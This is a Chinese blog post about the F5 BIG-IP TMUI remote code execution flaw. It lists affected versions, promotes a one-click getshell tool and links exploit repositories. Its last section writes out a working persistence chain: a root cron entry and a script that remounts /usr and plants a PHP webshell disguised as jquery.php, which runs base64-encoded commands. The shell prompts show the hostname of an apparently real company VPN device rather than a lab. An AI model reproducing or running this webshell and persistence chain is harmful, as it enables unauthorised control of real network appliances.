F5 BIG-IP远程代码执行漏洞

F5 RCE和Getshell

0x01 漏洞概述

在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。

未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

影响范围

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

0x02 漏洞复现

连夜写了个一键getshell的工具

一键getshell：

扫描二维码关注公众号，回复： 11578938 查看本文章

任意文件读取：

ps:感谢syst1m师傅带我

0x03 其他利用思路

1 JDBC反序列化:https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/

利用方法和工具：https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902

JDBC反序列化原理：https://xz.aliyun.com/t/7067

2 写webshell:

[root@hyundai_movis_vpn1:Active:In Sync] tmp # cat b744bf80-c14d-11ea-a8af-c0b883e8aceb
echo "2 * * * * /bin/sh /var/lib/logrotate.sh" >> /var/spool/cron/root;id

cat /var/lib/logrotate.sh
mount -o remount -rw /usr ;echo 'It works!<?php $a=base64_decode(@$_GET["bigip_g78kd3"]);system($a,$out);echo($out);?> ' > /usr/local/www/xui/common/scripts/jquery.php;mount -o remount -r /usr

至于为啥用mount -o remount -rw /usr

我在F5上测试了一下，单用户模式下通过执行mount -o remount -rw /usr后就可以有些写权限了

[root@hyundai_movis_vpn1:Active:In Sync] login # mount -o remount -r /usr
[root@hyundai_movis_vpn1:Active:In Sync] login # echo "1111">1.txt
-bash: 1.txt: Read-only file system
[root@hyundai_movis_vpn1:Active:In Sync] login # mount -o remount -rw /usr
[root@hyundai_movis_vpn1:Active:In Sync] login # echo "1111">1.txt